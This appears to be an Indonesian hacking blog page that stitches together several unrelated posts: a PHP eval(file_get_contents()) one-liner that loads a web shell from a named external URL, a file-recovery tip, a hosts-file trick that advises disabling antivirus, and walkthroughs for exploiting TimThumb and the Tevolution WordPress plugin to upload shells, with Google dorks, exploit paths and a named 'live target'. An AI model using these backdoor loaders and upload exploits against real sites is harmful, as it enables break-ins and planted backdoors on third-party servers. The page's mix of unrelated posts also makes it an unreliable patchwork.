SiPengembara Gila

Habis jalan jalan di google eh nemu deh ilmu beginian
Fungsi ini digunakan untuk mengambil fungsi script dari url eksternal / bisa juga Memperkecil Ukuran file php . intinya gini

Lu bisa ngambil file.txt dari web nah misal yg paling sering nih Shell / backdoor ,tp terserah mau script apa uploader , shell ato apalah terserah, tp disini contoh shell aja ya
file_Get_Contents () Function ini sangat menguntungkan cuk, karena ini bisa mengecilkan ukuran, bahkan rata rata gak nyampe 1kb cuk.

<?php 
eval("?>" . file_get_contents("localhost/filetxtnya.txt"));
 ?>

Contoh nih gw bikin shell txt yg udah ketanem , kalau belum ya tanem dulu lah di web :v Kalo dipastebin jgn lupa di Raw in

<?php 
eval("?>" . file_get_contents("http://sinkaroid.cf/shells/ghost.txt"));
 ?>

Nah otomatis script diatas yg berwarna biru itu adalah shell ringan dgn ukuran gak nyampe 1kb cuk.
intinya http://sinkaroid.cf/shells/ghost.txt itu adalah shell dengan ekstensi .php , nah kita masukan di script PHP file_Get_Contents () Function diatas maka jadilah shell bentuk .php yg ukuranya kecil ga nyampe 1kb =))



Sekian artikel ini, semoga bisa membantu =))


NB:
-Cara ini gak cuma buat nganu shell aja bro, pokoknya yg berekstensi .php

Sumber

Kali ini saya akan sedikit berbagi pengalaman, saat saya sehabis install ulang dari backbox ke windows data data saya hilang semua :v mungkin karna saya terlalu tolol saat itu, dan parahnya partisi hilang 100GB ++ ( belum tau cara balikin partisi yang hilang, yang bisa bantu tolong hubungi saya di FacebooK atau "apapedulimu13@gmail.com | ladyphantom67@gmail.com " )
oke lanjut saja, sebelumnya install "Recovery My Files"

1. Pilih salah satu, disini saya memilih "Complate Format Recover"


2.Kemudian Klik Manual Setting, Dan Setting Sesuai Kemauan Kalian Atau Biarkan Saja Default Dan Next

    Download Recovery My Files V.3.98

Cara Masuk Ke Website Yang Sibuk
Seringkali kita kesulitan ketika ingin buru-buru membuka suatu website namun akibat penuhnya koneksi yang masuk ke website itu kita akhirnya cuma bisa liat tanda loading dibrowser kita tapi gak masuk-masuk ke website tujuan kita. Salah satu contohnya tuh saat mau buka website SBMPTN untuk lihat hasil tes kita tapi karna banyaknya orang yang juga mengakses website tersebut maka kita pun terhambat. So, saya mau berbagi tips untuk mencoba masuk ke website tersebut meski website tersebut sibuk. Cekdisaut~


Catat alamat website yang ingin kita tuju (Contoh: sbmptn.or.id)
Klik Start > Run > CMD
Lakukan ping ke website tersebut melalui CMD dengan cara ketik ping alamat website tujuan (Contoh: ping sbmptn.or.id)
Catat ip yang tertera pada CMD setelah ping tadi
Buka hosts (C:\Windows\System32\drivers\etc\hosts > open with > notepad atau Klik Start > Run > notepad %windir%\system32\drivers\etc\hosts ) *Bagi windows 7 harap dirun as administrator terlebih dahulu

Setelah muncul notepad, ketikan ip dan alamat websitenya dibawah ip lain yang ada dihosts

Save dan tutup
Done! Buka kembali website yang penuh tersebut
Perhatian! Disebagian komputer terkadang antivirus menjadi sedikit penghambat maka direkomendasikan untuk dimatikan terlebih dahulu.

Sekian, semoga berhasil!!

Mr.Papz

no image specified
Query String : 
TimThumb version : 1.19 

berarti vuln ;) ,, nah yang harus kamu ketahui lagi itu adalah TimThumb version . 

Nah jadi target yang bisa kita exploitasi itu timthumb version 1.14 sampai dengan 

1.32 ,, Udah ngerti kan ? :) kalo belum ngerti liat aja tutorialnya :) ,, Yuk TKP .. 

Alat dan Bahan : 

1. Subdomain yang terintegrasi website berikut 

   : picasa.com

   : blogger.com

   : flixr.com 

sebenarnya ada 5 tapi aku gk hafal U,u ,, contoh " flxr.com.namawebsitekamu.com/shell.php "

, Nah sebelumnya kamu musti upload dulu shell di subdomain kamu yang letaknya di directory

public_html / httpdocs / www / dan macam² .. 

2. Otak dan pantang menyerah ;) .. 

Exploit : 

1. Kali ini saya dah punya target sendiri ,, lihat gambar .. 

3. Tuh liat gambarnya kalo gitu dah " Game Over " namanya ;) .. tinggal buka shellnya aja kan di situ ada tulisan " Unable to open image :" kalo gitu skrng tinggal buka shellnya , caranya copy md5 yang tadi contoh :

" /cache/c89de71219ef668b7642e43e04d5d4df.php " masih kurang jelas ? liat gambar ..

4. Nah skrng kita copas ke urlnya jadi " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php "  , lihat di bawah ,,
5. Selesai deh :D ,,, nah itu kalo ane gk upload shell di subdomainnya tapi upload uploader aja jadi ky gitu ,,
hehe sory yak uploadernya punya pak deb~X ,,

Source : Extreme Crew 
post diambil dari SINI

Dork :inur:plugins/tevolution < Bisa di kembangin
Exploit:wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
Array Filedata , ataugak pake mass exploiternya agus 
localheart.esy.es/public_html/public_html/tools/ <auto exploit

Bypass shell , shell.php4 , 
Shell akses / wp-content/uploads/2016/05/shell.php


Btw di site itu kalo search di google image ada yang tevolution-directory , atau sebagainya langsung exploit aja pake exploit di atas 


Author : Stupidc0de

GreetZ : Sanjungan jiwa - indoxploit

---

http://ezeebe.com/wp-content/plugins/Tev...upload.php < Live target
Vuln site : BLANK!


Sumber : Post diambil dari Forum IndoXploit yang post oleh Condet6etar

- intitleayPal Account Checker
- intitleayPal Email Valid Checker
Exploit : /function.php?76=browser
 Kalo emang ada hidden uploadernya nanti bakal muncul uploader disitu , 
Shell aksesnya , site.coli/shell.php / site.co.li/path/shell.php

Btw path itu yang biasa ada didepan sitenya , jembut/wp/ < wpnya path dari wordpress , jadi kalo mau exploit didepan pathnya 

Sekian dan terimagaji